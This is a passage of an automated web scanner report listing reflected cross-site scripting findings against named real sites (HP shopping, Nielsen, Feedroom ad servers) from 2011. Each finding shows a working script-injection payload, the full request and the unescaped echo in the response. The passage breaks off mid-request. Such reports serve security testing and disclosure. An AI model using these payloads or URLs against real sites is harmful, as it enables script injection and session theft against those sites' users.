Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $mon request parameter is copied into the HTML document as plain text between tags. The payload 3b1c6<img%20src%3da%20onerror%3dalert(1)>7933f9bb270 was submitted in the $mon parameter. This input was echoed as 3b1c6<img src=a onerror=alert(1)>7933f9bb270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D3b1c6<img%20src%3da%20onerror%3dalert(1)>7933f9bb270&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:57 GMT
Date: Thu, 22 Sep 2011 00:54:57 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/}3b1c6<img src=a onerror=alert(1)>7933f9bb270

1.7. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 249fa<img%20src%3da%20onerror%3dalert(1)>3b411bd2011 was submitted in the REST URL parameter 5. This input was echoed as 249fa<img src=a onerror=alert(1)>3b411bd2011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile249fa<img%20src%3da%20onerror%3dalert(1)>3b411bd2011?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 82
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:55:00 GMT
Date: Thu, 22 Sep 2011 00:55:00 GMT
Connection: close

Unable to find /HPShopping/promo3_tile249fa<img src=a onerror=alert(1)>3b411bd2011

1.8. http://nielsen.com/content/corporate/us/en/search.html [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search.html

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57279"><script>alert(1)</script>89e6489bffd was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/corporate/us/en/search.html?q=mobile+tv+internet57279"><script>alert(1)</script>89e6489bffd HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 55637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...
<input class="serform" size="41" maxlength="2048" name="q" id="query" value="mobile tv internet57279"><script>alert(1)</script>89e6489bffd" />
...[SNIP]...

1.9. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html [caller parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search/_jcr_content/par.autocomp.html

Issue detail

The value of the caller request parameter is copied into the HTML document as plain text between tags. The payload cdce6<script>alert(1)</script>2204e516bb2 was submitted in the caller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/corporate/us/en/search/_jcr_content/par.autocomp.html?q=mobile%20t&caller=queryheadcdce6<script>alert(1)</script>2204e516bb2 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 426

<div class="search section">


{[Top U.S. Markets for Mobile
, to Acquire Telephia, Inc., The
, to Measure The Mobile Media
, Mobile And Mediamark Research &amp;
, TV, Internet and Mobile Usage
, Mobile @Plan, Extending its Online
, Tweens Own a Mobile Phone,
, to Launch Mobile Advertising Measurement
, Mobile Youth Around the World
, the Mobile Web
, Close----queryheadcdce6<script>alert(1)</script>2204e516bb2]}
</div>
...[SNIP]...

1.10. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284d4"><script>alert(1)</script>40c00f65fef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com284d4"><script>alert(1)</script>40c00f65fef/hpscaleshare/personalcomputingadvancements/10006@x16?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 384
Content-Type: text/html
Cache-Control: private
Content-Length: 384

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com284d4"><script>alert(1)</script>40c00f65fef/hpscaleshare/personalcomputingadvancements/934644348/x16/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.11. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 564a6<script>alert(1)</script>d72fa664855 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare564a6<script>alert(1)</script>d72fa664855/personalcomputingadvancements/10006@x16?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 403
Content-Type: text/html
Cache-Control: private
Content-Length: 403

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare564a6<script>alert(1)</script>d72fa664855/personalcomputingadvancements/L13/987423938/x16/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.12. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 49930<script>alert(1)</script>4f0b168c0b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements49930<script>alert(1)</script>4f0b168c0b8/10006@x16?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 403
Content-Type: text/html
Cache-Control: private
Content-Length: 403

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements49930<script>alert(1)</script>4f0b168c0b8/L13/946458061/x16/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.13. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 371f1"><script>alert(1)</script>2baacc6de57 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16371f1"><script>alert(1)</script>2baacc6de57?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 377
Content-Type: text/html
Cache-Control: private
Content-Length: 377

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/1475599205/x16371f1"><script>alert(1)</script>2baacc6de57/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.14. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10650"><script>alert(1)</script>239ec9e22a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com10650"><script>alert(1)</script>239ec9e22a5/hpscaleshare/personalcomputingadvancements/10098@x45?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 384
Content-Type: text/html
Cache-Control: private
Content-Length: 384

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com10650"><script>alert(1)</script>239ec9e22a5/hpscaleshare/personalcomputingadvancements/780061163/x45/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.15. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2d577<script>alert(1)</script>1dc2957ae9a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare2d577<script>alert(1)</script>1dc2957ae9a/personalcomputingadvancements/10098@x45?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 404
Content-Type: text/html
Cache-Control: private
Content-Length: 404

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare2d577<script>alert(1)</script>1dc2957ae9a/personalcomputingadvancements/L13/1584850811/x45/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.16. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 17382<script>alert(1)</script>e47d32790fd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements17382<script>alert(1)</script>e47d32790fd/10098@x45?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 403
Content-Type: text/html
Cache-Control: private
Content-Length: 403

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements17382<script>alert(1)</script>e47d32790fd/L13/511424165/x45/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.17. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abbb"><script>alert(1)</script>df0488ef607 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x454abbb"><script>alert(1)</script>df0488ef607?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
